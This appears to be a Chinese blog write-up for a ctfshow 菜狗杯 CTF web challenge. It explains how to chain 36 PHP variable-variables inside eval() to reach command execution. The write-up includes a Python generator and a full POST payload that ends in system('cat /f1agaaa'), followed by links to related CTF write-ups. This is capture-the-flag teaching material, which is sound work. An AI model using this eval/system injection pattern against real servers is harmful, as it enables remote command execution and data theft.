菜狗杯Web_我眼里只有$wp

原题：

虽然不太会php，但看了题目很容易联想到是想要把这么多的$符号都给抵消掉，可以先用Python看一下有多少个$，得知一共是36个$，那我们搞出36个变量就好啦，而且外面套的函数是eval()，那就让最后一个变量用于执行命令。
具体思路就是把上一个变量赋值给下一个变量，直到第36个变量，给它赋值为想要执行的命令，并且从原题的php中可以看到，需要用post方法传参。
因为变量太多，所以还是借助Python生成一下，题目给出的$_可以看做a0，我们生成从a1到a35，最后添上a35的值。
浅写这么三行Python：

s='_'
for i in range(1,36):s+='='+'a'+str(i)+'&'+'a'+str(i)

运行效果如下：

把上面得到的字符串放到POST请求报文的报文体中，并在最后添加变量a35的值（即想要执行的命令）。

先浅试一下ls命令查看下根目录，看到有f1agaaa：

把命令换成cat /f1agaaa即可回显出flag：

payload如下：

_=a1&a1=a2&a2=a3&a3=a4&a4=a5&a5=a6&a6=a7&a7=a8&a8=a9&a9=a10&a10=a11&a11=a12&a12=a13&a13=a14&a14=a15&a15=a16&a16=a17&a17=a18&a18=a19&a19=a20&a20=a21&a21=a22&a22=a23&a23=a24&a24=a25&a25=a26&a26=a27&a27=a28&a28=a29&a29=a30&a30=a31&a31=a32&a32=a33&a33=a34&a34=a35&a35=system(‘cat /f1agaaa’);

注意最后有分号！
ps：因为写博客时候环境过期了所以重新开了一个，导致两张burp的截图里域名不一样

菜狗杯Web_我眼里只有$wp相关推荐

ctf菜狗杯OSINT wp
菜狗杯OSINTwp Fish And Turtles 由B-6448和8月27日可以查到由早上赶飞机可以得知flag ctfshow{成都-厦门-3U6953} 碧海蓝天把他放到搜狗识图![可以得 ...
ctfshow【菜狗杯】misc
文章目录 web web签到 web2 c0me_t0_s1gn 我的眼里只有$ 抽老婆一言既出驷马难追 TapTapTap Webshell 化零为整无一幸免无一幸免_FIXED 传说之下( ...
菜狗杯Misc一层一层一层地剥开我的♥wp
目录一.原题二.解题步骤对jpg图片的处理对文件名是一个心形的数据文件的处理 base100解码这题完全是看着官方wp复现的,感觉涉及的步骤比较多但每一步本身不难,多记录一遍加深印象. 一. ...
菜狗杯Misc抽象画wp
目录一.拿到题目先干嘛二.具体的解密操作 1.把文本放到CyberChef中用Magic解密 2.把完整的解密内容复制出来 3.打开010并以hex格式粘贴内容 4.点一下HEX 5.保存成png ...
ctfshow 菜狗杯 taptap wp
启动环境小游戏看源码查找关键字score 解码得访问该路径,拿到flag
ctfshow菜狗杯 web 我的眼里只有$
萌新入坑,防懒细胞滋生题目有36个$,给出的最后一个$_可以看做变量0 生成从变量1到变量35,最后赋给变量35的值为真正想执行的命令. my_str = '_' for i in range(26 ...
ctfshow菜狗杯webwp
web签到 <?php error_reporting(0); highlight_file(__FILE__);eval($_REQUEST[$_GET[$_POST[$_COOKIE['CT ...
CTFSHOW 菜狗杯--WEB
WEB签到 eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]); 简单的解释下这个嵌 ...
CTFshow菜狗杯-misc-wp（详解脚本过程全）
首先感谢ctf平台和各位出题的大佬其次感谢各位读者,对我的支持( •̀ ω •́ )y 有什么问题和建议可以私聊我废话不多话开启你们的旅程吧这个也是我这几天才看一些见解和思路分享给你们希望你 ...
CTFSHOW菜狗杯 web
文章目录 web签到 web2 c0me_t0_s1gn 我的眼里只有$ 抽老婆一言既出驷马难追 TapTapTap Webshell 化零为整无一幸免传说之下(雾) 算力超群算力升级 2 ...

菜狗杯Web_我眼里只有$wp

菜狗杯Web_我眼里只有$wp相关推荐

最新文章

热门文章